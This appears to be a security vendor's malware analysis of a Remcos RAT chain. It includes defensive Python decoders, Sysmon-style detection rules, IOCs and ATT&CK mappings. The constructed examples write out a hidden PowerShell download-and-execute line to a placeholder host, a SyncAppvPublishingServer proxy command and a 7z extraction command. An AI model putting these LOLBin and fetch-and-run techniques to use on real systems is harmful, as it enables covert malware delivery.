05/29/2026

Deceptively Sweet: DonutLoader Reloaded in a modern Remcos RAT Infection


An analysis by John Dador & Mathew Dela Cruz

Overview

G DATA analysts discovered a new Remcos RAT infection chain that starts with a seemingly harmless batch file executing encoded commands. The batch file creates hidden directories and retrieves additional tools as well as encrypted payloads, all while blending into normal system activity.

Unlike earlier Remcos RAT campaigns documented by Fortinet and McAfee, which mostly relied on PowerShell-hosted .NET loaders to reflectively load assemblies in memory, this infection chain uses DonutLoader shellcode and AutoIt-based staging to reach execution. This shifts Remcos RAT's loader architecture away from managed .NET execution toward a more portable, runtime-independent in-memory delivery model: the Donut stub maps and runs the embedded PE itself, so the chain no longer depends on the .NET runtime being available in the host process.

Infection Chain

The illustration shows how Remcos RAT is delivered through a multi-stage execution chain involving scripts, Living-off-the-Land Binaries (LOLBins) and staged extraction, ultimately delivering the final payload.

Initial Access

The infection begins with a phishing email carrying a malicious Windows batch file named Bestellung.CMD as an attachment. We were not able to retrieve the phishing email itself, but the filename is the German word for "order", a lure theme commonly used in phishing campaigns.

Execution follows when the batch file launches cscript.exe, a legitimate Windows Script Host binary that is frequently abused as a LOLBin. It is one of the two Windows Script Host (WSH) executables, the console counterpart of wscript.exe.

cscript.exe then runs SyncAppvPublishingServer.vbs, a legitimate Microsoft App-V component that ships with Windows 10 and later and is commonly present in enterprise environments. Because it is a trusted part of the operating system, it is an attractive LOLBin: the script takes a PowerShell command fragment as its argument and hands it, unchecked, to powershell.exe. The batch file uses it to execute a malicious Base64-encoded payload supplied as that argument. The whole step runs silently, with error messages and the WSH banner suppressed, while PowerShell's Invoke-Expression (IEX) decodes and executes the payload in memory.

The use of SyncAppvPublishingServer.vbs has not been widely documented in previous Remcos RAT campaigns, which makes this technique noteworthy.

The obfuscated Base64 payload is first cleaned by a simple string replacement (.Replace('QUBLQSVO','')) that removes junk inserted into the encoded text; the junk breaks naive Base64 decoding and defeats signatures written for the plain encoded blob. SyncAppvPublishingServer.vbs acts purely as an execution proxy, forwarding the argument unchanged into PowerShell, where the replacement and the Base64 decoding take place. The result is a PowerShell command configured to run in non-interactive, hidden mode.

The PowerShell command line assembled by SyncAppvPublishingServer.vbs first modifies the module search path so that modules are loaded from the current directory instead of the system path, then imports AppvClient, the legitimate Windows module used for application virtualization. The attacker's argument is appended to this legitimate prologue, so the malicious code executes inside what looks like a routine App-V publishing refresh; only the argument string gives it away.

The decoded payload contains the commands that download the components for the next phase of the infection.
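As an added illustration (not code from the campaign or from G DATA), the following Python reproduces the two steps the loader performs on the victim, the .Replace('QUBLQSVO','') cleanup and the Base64 decode, the way an analyst would run them offline on a captured argument, and then pulls download URLs and execution flags out of the result. The marker is the one from the sample; the encoded command the script builds for itself is constructed for this example, with an invented host name, and is not the real payload.

```python
"""Recover the PowerShell stage behind a junk-padded Base64 argument.

Added analyst helper written for this article; it is not code from the
campaign or from G DATA. It reproduces the two steps the loader performs on
the host, .Replace('QUBLQSVO','') followed by Base64 decoding, and then pulls
basic indicators out of the result. The junk marker is the one seen in the
sample; the encoded command built at the bottom is CONSTRUCTED for this
example and is not the real payload.
"""
import base64
import re

JUNK_MARKER = "QUBLQSVO"                      # marker observed in the sample
URL_RE = re.compile(r"https?://[^\s'\"()<>]+")
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
IEX_RE = re.compile(r"\bIEX\b|Invoke-Expression", re.I)


def strip_junk(blob: str, marker: str = JUNK_MARKER) -> str:
    """Equivalent of PowerShell's .Replace(marker, ''); also drops whitespace
    that a mail gateway or copy/paste may have introduced."""
    return re.sub(r"\s+", "", blob.replace(marker, ""))


def decode_stage(blob: str, marker: str = JUNK_MARKER) -> str:
    """Strip the junk marker, Base64-decode, and pick the text encoding."""
    raw = base64.b64decode(strip_junk(blob, marker), validate=True)
    # [Text.Encoding]::Unicode and -EncodedCommand mean UTF-16LE, which for an
    # ASCII script shows up as a NUL in every second byte; a script decoded with
    # a plain [Convert]::FromBase64String + ASCII/UTF8 has no NULs at all.
    if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def extract_indicators(script: str) -> dict:
    """What an analyst wants first: download sources, hidden window, IEX."""
    return {
        "urls": URL_RE.findall(script),
        "hidden_window": HIDDEN_RE.search(script) is not None,
        "invoke_expression": IEX_RE.search(script) is not None,
    }


def make_junk_sample(script: str, marker: str = JUNK_MARKER, every: int = 7) -> str:
    """CONSTRUCTED sample builder: UTF-16LE + Base64 as PowerShell would, then
    the junk marker inserted every `every` characters of the Base64 text."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return marker.join(b64[i:i + every] for i in range(0, len(b64), every))


# Placeholder stage: the host name is invented; the real URLs are not reproduced.
SAMPLE_SCRIPT = (
    "powershell -NonInteractive -WindowStyle Hidden -Command "
    "\"$u='https://filedn.example/stage.ps1';"
    "IEX (New-Object Net.WebClient).DownloadString($u)\""
)

if __name__ == "__main__":
    stage = decode_stage(make_junk_sample(SAMPLE_SCRIPT))
    print(stage)
    print(extract_indicators(stage))
```

The encoding heuristic matters in practice: a blob decoded with `[Text.Encoding]::Unicode` in the sample has to be read as UTF-16LE, and reading it as UTF-8 yields text full of NUL characters that silently breaks URL extraction and string matching.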

Payload Staging and Tool Deployment

The PowerShell script downloads three additional files from the cloud storage service pCloud (filedn[.]com): the legitimate 7-Zip components 7z.exe and 7z.dll, and a password-protected archive named iphdcrtj.zip. Bundling these serves two purposes.

First, it makes the infection chain reliable across different Windows environments. By shipping its own extraction tool, the loader does not depend on locally installed utilities and avoids failures caused by missing dependencies or restricted configurations. Second, the password-protected archive slows initial static inspection, because the contents must be extracted before they can be analyzed, and it prevents the file hosting service from scanning and flagging the malware.

Looking at the decoded PowerShell script, the structure and formatting of the commands are unusually consistent, and the script contains code comments, something not typically seen in manually written malicious scripts. These characteristics suggest that the script may have been generated or refined with AI-assisted tooling, which has become increasingly common in script development.

The password-protected archive iphdcrtj.zip contains a malicious JScript file, iphdcrtj.js, which is dropped into C:\Users\Public. The script is obfuscated with junk strings to hinder static analysis. It drops two files: an AutoIt3 interpreter (version 3.3.16.1) and a fake PNG image file.

iphdcrtj.js then executes the dropped AutoIt interpreter with the fake PNG as its script argument. The interpreter ignores the file extension, so the .png name is purely cosmetic: although the file looks like a benign image, it is an AutoIt script containing encoded strings and API definitions that are extracted and decrypted at runtime. A check for the PNG signature (89 50 4E 47 0D 0A 1A 0A) at offset 0 is enough to tell such a file apart from a real image. The embedded decoding routine is a single-byte XOR with the constant key 0x63. The recovered data reveals multiple data structures and Windows API functions commonly used in process injection.
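The decoding routine above, as an added example written for this article (it is not the sample's AutoIt code and not G DATA's tooling): a single-byte XOR decoder that also brute-forces the key from the ciphertext alone, which is what an analyst needs when the key is buried in obfuscated AutoIt rather than read off directly. The key 0x63 and the API names are from the analysis; the hex blob the script decodes is constructed by encrypting a made-up string table, and the '|' separator is an assumption, not something taken from the real fake PNG.

```python
"""Single-byte XOR string recovery for the AutoIt stage.

Added example written for this article; it is not the sample's AutoIt code and
not G DATA's tooling. It implements the decoding routine described above (XOR
with a constant key) and, in addition, brute-forces the key from the ciphertext
alone. The key 0x63 and the API names are from the analysis; the hex blob at
the bottom is CONSTRUCTED by encrypting a made-up string table and is not taken
from the real fake PNG. The '|' separator is an assumption.
"""
import string
from typing import List, Optional, Tuple

# Names expected in a process-injection stage; used to score candidate keys.
INJECTION_APIS = (
    b"kernel32.dll", b"VirtualAllocEx", b"WriteProcessMemory",
    b"CreateRemoteThread", b"NtUnmapViewOfSection", b"ResumeThread",
)
PRINTABLE = set(string.printable.encode("ascii"))


def xor_single_byte(data: bytes, key: int) -> bytes:
    """XOR every byte with one constant; the operation is its own inverse."""
    if not 0 <= key <= 0xFF:
        raise ValueError("key must be a single byte")
    return bytes(b ^ key for b in data)


def score_plaintext(candidate: bytes) -> float:
    """Printable ratio (0..1) plus one point per known API name found."""
    printable = sum(b in PRINTABLE for b in candidate) / max(len(candidate), 1)
    return printable + sum(name in candidate for name in INJECTION_APIS)


def recover_key(data: bytes) -> int:
    """Try all 256 keys and keep the one whose output looks most like text."""
    return max(range(256), key=lambda k: score_plaintext(xor_single_byte(data, k)))


def decode_hex_blob(hex_blob: str, key: Optional[int] = None) -> Tuple[int, str]:
    """Decode an AutoIt-style hex string ("0x..." or bare hex). If no key is
    given it is recovered by brute force. Returns (key, plaintext)."""
    clean = hex_blob[2:] if hex_blob.lower().startswith("0x") else hex_blob
    data = bytes.fromhex(clean)
    if key is None:
        key = recover_key(data)
    return key, xor_single_byte(data, key).decode("latin-1")


def split_string_table(plaintext: str, sep: str = "|") -> List[str]:
    """Split a decoded table on its separator ('|' is an assumption here)."""
    return [s for s in plaintext.split(sep) if s]


# CONSTRUCTED: a plausible decrypted string table, then encrypted with 0x63.
SAMPLE_PLAINTEXT = ("kernel32.dll|VirtualAllocEx|WriteProcessMemory|"
                    "CreateRemoteThread|ResumeThread|colorcpl.exe")
SAMPLE_KEY = 0x63
SAMPLE_HEX = "0x" + xor_single_byte(SAMPLE_PLAINTEXT.encode("ascii"), SAMPLE_KEY).hex().upper()

if __name__ == "__main__":
    key, text = decode_hex_blob(SAMPLE_HEX)
    print(f"recovered key 0x{key:02X}")
    for entry in split_string_table(text):
        print(" ", entry)
```

The scoring deliberately combines a printable-ratio test with known API names: on short blobs several keys can produce mostly printable output, but only the right key produces exact strings such as WriteProcessMemory, so the brute force converges without needing the key read out of the script.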

These structures and APIs are used to reconstruct the next-stage payload in memory and inject it into colorcpl.exe, the legitimate Windows Color Management utility.

Final Payload: Remcos RAT

The injected payload is DonutLoader shellcode. Donut is a widely used open-source tool that produces a position-independent shellcode stub with a PE or .NET payload embedded inside it, so the payload can be loaded directly in memory. Donut-generated shellcode has appeared in various real-world campaigns, for example the Beagle backdoor, which spread through fake Claude sites as recently reported by Sophos, and in loaders and infection chains delivering commodity malware such as RATs and information stealers. Our recent analysis of loader-based threats such as KissLoader shows the same pattern: Donut-generated shellcode used as an intermediate stage to decrypt and inject the final payload. However, these additional staging layers combined with process injection also widen the detection surface, giving defenders more opportunities to intercept the chain before the final payload executes.

Fortunately, a reliable open-source decryptor is available on GitHub, which we used to decrypt the DonutLoader shellcode. The decrypted output reveals that the payload is Remcos RAT version 7.2.1 Pro, a relatively new version.

Same RAT, just got Sweeter

This infection highlights Remcos RAT's consistent reliance on techniques in which payloads are decoded, staged and executed directly in memory at runtime. The use of multiple scripting layers (PowerShell, VBScript and JScript) together with native Windows utilities suggests that this iteration of Remcos RAT is designed with stealth and operational flexibility in mind. Another consistent characteristic that warrants attention is the extensive use of LOLBins: legitimate Windows utilities are leveraged for proxy and in-memory execution, evading early detection and blending malicious activity with normal system behavior.
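The LOLBin usage just described is also what makes the chain detectable from process telemetry. The following Python is an added example, not part of the original analysis and not a G DATA product rule, that turns the parent/child and command-line relationships of this chain into checks over Sysmon-style process-creation events (Event ID 1 field names). The events it runs on are constructed for the example; the C:\Users\Public paths, the parent processes, the archive password and the interpreter file name are assumptions rather than indicators from this post.

```python
"""Detection checks for the LOLBin chain described in this post.

Added example written for this article; it is not part of the original
analysis and not a G DATA product rule. It encodes the parent/child and
command-line relationships the chain exhibits as checks over process-creation
telemetry, using Sysmon Event ID 1 field names (Image, ParentImage,
CommandLine, OriginalFileName). The events at the bottom are CONSTRUCTED to
resemble the chain and are not real telemetry; the C:\\Users\\Public paths,
parent processes, interpreter file name and 7z password are assumptions.
"""
import re
from typing import Callable, Dict, List, Set

Event = Dict[str, str]


def _name(ev: Event, field: str = "Image") -> str:
    """Lower-cased file name of an image path field."""
    return ev.get(field, "").rsplit("\\", 1)[-1].lower()


def appv_script_proxy(ev: Event) -> bool:
    # SyncAppvPublishingServer.vbs hands its argument to powershell.exe; a
    # benign publishing refresh never carries IEX, Base64 decoding or pipes.
    cl = ev.get("CommandLine", "")
    return (_name(ev) in {"cscript.exe", "wscript.exe"}
            and "syncappvpublishingserver.vbs" in cl.lower()
            and re.search(r"\biex\b|invoke-expression|frombase64string|[;|]", cl, re.I) is not None)


def hidden_powershell_from_wsh(ev: Event) -> bool:
    # The proxied PowerShell is a hidden-window child of the WSH host.
    cl = ev.get("CommandLine", "")
    return (_name(ev) == "powershell.exe"
            and _name(ev, "ParentImage") in {"cscript.exe", "wscript.exe"}
            and re.search(r"-w(?:indowstyle)?\s+hidden", cl, re.I) is not None)


def seven_zip_password_from_powershell(ev: Event) -> bool:
    # 7z.exe is not a Windows component; PowerShell driving it with -p<pw>
    # to unpack a freshly downloaded archive is the staging step above.
    cl = ev.get("CommandLine", "")
    return (_name(ev) == "7z.exe"
            and _name(ev, "ParentImage") == "powershell.exe"
            and re.search(r"\s-p\S+", cl) is not None)


def autoit_running_non_au3(ev: Event) -> bool:
    # OriginalFileName survives renaming of the dropped interpreter; AutoIt
    # ignores the extension, so a .png/.jpg/.dat "script" is the tell.
    cl = ev.get("CommandLine", "")
    return (ev.get("OriginalFileName", "").lower() == "autoit3.exe"
            and re.search(r"\.(png|jpe?g|gif|bmp|dat|txt|log)\"?\s*$", cl, re.I) is not None)


def colorcpl_unusual_parent(ev: Event) -> bool:
    # Color Management is opened from the control panel or explorer, not by a
    # script interpreter or by anything living in a user-writable directory.
    parent = ev.get("ParentImage", "")
    return (_name(ev) == "colorcpl.exe"
            and (_name(ev, "ParentImage") not in {"explorer.exe", "control.exe", "rundll32.exe"}
                 or "\\users\\" in parent.lower()))


RULES: Dict[str, Callable[[Event], bool]] = {
    "appv_script_proxy": appv_script_proxy,
    "hidden_powershell_from_wsh": hidden_powershell_from_wsh,
    "seven_zip_password_from_powershell": seven_zip_password_from_powershell,
    "autoit_running_non_au3": autoit_running_non_au3,
    "colorcpl_unusual_parent": colorcpl_unusual_parent,
}


def evaluate(ev: Event) -> List[str]:
    """Names of the rules a single event triggers."""
    return [name for name, rule in RULES.items() if rule(ev)]


def triggered_rules(events: List[Event]) -> Set[str]:
    """Rules triggered anywhere in a batch: all five on one host within minutes
    is the chain described above; any one alone is still worth a look."""
    return {name for ev in events for name in evaluate(ev)}


# CONSTRUCTED events mirroring the chain (not real telemetry); last one is benign.
SAMPLE_EVENTS: List[Event] = [
    {"Image": r"C:\Windows\System32\cscript.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": ('cscript.exe //nologo //B C:\\Windows\\System32\\SyncAppvPublishingServer.vbs '
                     '"n;$b=\'<base64>\';IEX([Text.Encoding]::Unicode.GetString('
                     '[Convert]::FromBase64String($b.Replace(\'QUBLQSVO\',\'\'))))"')},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cscript.exe",
     "CommandLine": ('powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy Unrestricted '
                     '-Command "& {Import-Module AppvClient; Sync-AppvPublishingServer n; ...}"')},
    {"Image": r"C:\Users\Public\7z.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Users\Public\7z.exe x -pEXAMPLE -oC:\Users\Public C:\Users\Public\iphdcrtj.zip"},
    {"Image": r"C:\Users\Public\AutoIt3.exe", "OriginalFileName": "AutoIt3.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Users\Public\AutoIt3.exe" "C:\Users\Public\USCSHBRBWUYUCQNUIBPWLVUFKIAGWBOOAKDDXWTGRUVHWXIHQQRQXJASLKLALICCV.png"'},
    {"Image": r"C:\Windows\System32\colorcpl.exe", "ParentImage": r"C:\Users\Public\AutoIt3.exe",
     "CommandLine": r"C:\Windows\System32\colorcpl.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(f"{_name(ev):<16} {evaluate(ev)}")
```

Each check targets a relationship rather than a file hash, so it survives the trivially changed names (archive, JScript, PNG) between campaigns; the AutoIt check keys on OriginalFileName precisely because the dropped interpreter need not be called AutoIt3.exe on disk.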

Once deployed, Remcos RAT functions as a full-featured Remote Access Trojan (RAT) that establishes communication with an attacker-controlled command-and-control (C2) server. After the connection is established, operators can remotely control the compromised host, execute commands, manage files, capture screenshots, log keystrokes, harvest credentials, activate webcams or microphones and deploy additional payloads. These capabilities were extensively documented by Fortinet in its recent research on modern Remcos RAT activity.

While there are clear similarities across Remcos RAT campaigns, this analysis reveals newly incorporated techniques. The use of DonutLoader-generated shellcode for process injection had not been widely observed in Remcos RAT infections prior to this activity, which points to continuous refinement of Remcos RAT's evasion and execution methods.

IOCs

  • Bestellung.CMD - 5B3089EEFAB0E043AF8894DE86022BDC6DF2F42F7098DBD530F42C0EC861D5D8 - Script.Trojan.Agent.BSQ
  • iphdcrtj.js - 14A0D7978872A2739AC31EF42539E8C708AF6AFCCC5EB74F22FE2B676BFA2DF7 - Script.Trojan.Agent.VVW4LC
  • USCSHBRBWUYUCQNUIBPWLVUFKIAGWBOOAKDDXWTGRUVHWXIHQQRQXJASLKLALICCV.png (AutoIt script) - B9DA295C34ACCF3632C2C4B6D9E3C74791B4514D27814F79E9BCB77CE168A347 - Trojan.Generic.39655044
  • Remcos RAT payload - 48BD36C3B8D6A3BF5DB4E7B0BBC1692E8CB900475DC7AE16E9F1FA7BA97C8ADF - Win32.Backdoor.Remcos.TDW2LS

MITRE ATT&CK TTPs

Initial Access

T1566.001 – Phishing: Spearphishing Attachment (malicious .CMD file delivered by email)

Execution

T1059.003 – Command and Scripting Interpreter: Windows Command Shell (Bestellung.CMD)

T1059.005 – Command and Scripting Interpreter: Visual Basic (SyncAppvPublishingServer.vbs via cscript.exe)

T1059.001 – Command and Scripting Interpreter: PowerShell (Base64 payload executed via IEX)

T1059.007 – Command and Scripting Interpreter: JavaScript (obfuscated iphdcrtj.js)

T1059.010 – Command and Scripting Interpreter: AutoHotKey & AutoIT (dropped AutoIt3 interpreter running the fake PNG script)

Defense Evasion

T1216.002 – System Script Proxy Execution: SyncAppvPublishingServer (PowerShell proxied through the trusted App-V script)

T1218 – System Binary Proxy Execution (cscript.exe and other LOLBins)

T1027 – Obfuscated Files and Information (Base64 with inserted junk, obfuscated JScript, XOR-encoded AutoIt strings, password-protected ZIP)

T1036 – Masquerading (AutoIt script disguised as a PNG, hidden directories)

T1140 – Deobfuscate/Decode Files or Information (string replacement, Base64 and XOR decoding at runtime)

T1564.003 – Hide Artifacts: Hidden Window (hidden PowerShell execution)

T1055 – Process Injection (injection into colorcpl.exe)

T1620 – Reflective Code Loading (Donut shellcode loading the Remcos PE in memory)

Command and Control

T1105 – Ingress Tool Transfer (download of 7z.exe, 7z.dll and iphdcrtj.zip from pCloud)

T1071 – Application Layer Protocol (Remcos C2 communication)

T1219 – Remote Access Software (Remcos RAT payload)